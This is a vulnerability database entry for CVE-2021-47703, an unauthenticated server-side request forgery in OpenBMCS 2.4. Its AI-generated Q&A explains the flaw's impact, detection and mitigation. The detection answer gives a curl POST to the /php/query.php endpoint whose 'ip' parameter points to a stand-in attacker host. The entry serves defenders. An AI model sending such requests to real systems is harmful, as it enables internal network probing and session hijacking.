CVE-2021-47703
BaseFortify
Publication date: 2025-12-09
Last updated on: 2025-12-09
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| openbmcs | openbmcs | 2.4 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is an unauthenticated Server-Side Request Forgery (SSRF) in OpenBMCS 2.4. It allows attackers to bypass firewalls and perform service and network enumeration on the internal network by making the application send HTTP requests to arbitrary external domains specified in the 'ip' parameter. This can also lead to hijacking of current sessions.
How can this vulnerability impact me? :
The vulnerability can impact you by allowing attackers to bypass network defenses such as firewalls, gather information about internal services and networks, and potentially hijack active sessions. This can lead to unauthorized access, data exposure, and further exploitation within your internal network.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unusual HTTP POST requests to the /php/query.php endpoint with the 'ip' parameter containing external domains. A practical detection method is to capture and analyze HTTP traffic for such requests. For example, using curl to test the vulnerability: curl -X POST -d "ip=http://attacker.com" http://<target>/php/query.php. Network monitoring tools can also be used to detect outbound HTTP requests initiated by the application to unexpected external hosts. Additionally, reviewing server logs for POST requests to /php/query.php with suspicious 'ip' parameter values can help identify exploitation attempts. [1, 3, 4]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or validating the 'ip' parameter input in the /php/query.php endpoint to prevent arbitrary external requests. Applying input validation to ensure only allowed internal IP addresses or domains are accepted can block exploitation. If a patch or update is available from the vendor, applying it promptly is recommended. Additionally, implementing network-level controls such as firewall rules to restrict outbound HTTP requests from the OpenBMCS server to untrusted external hosts can reduce risk. Monitoring and blocking suspicious traffic related to this vulnerability is also advised. [1, 4]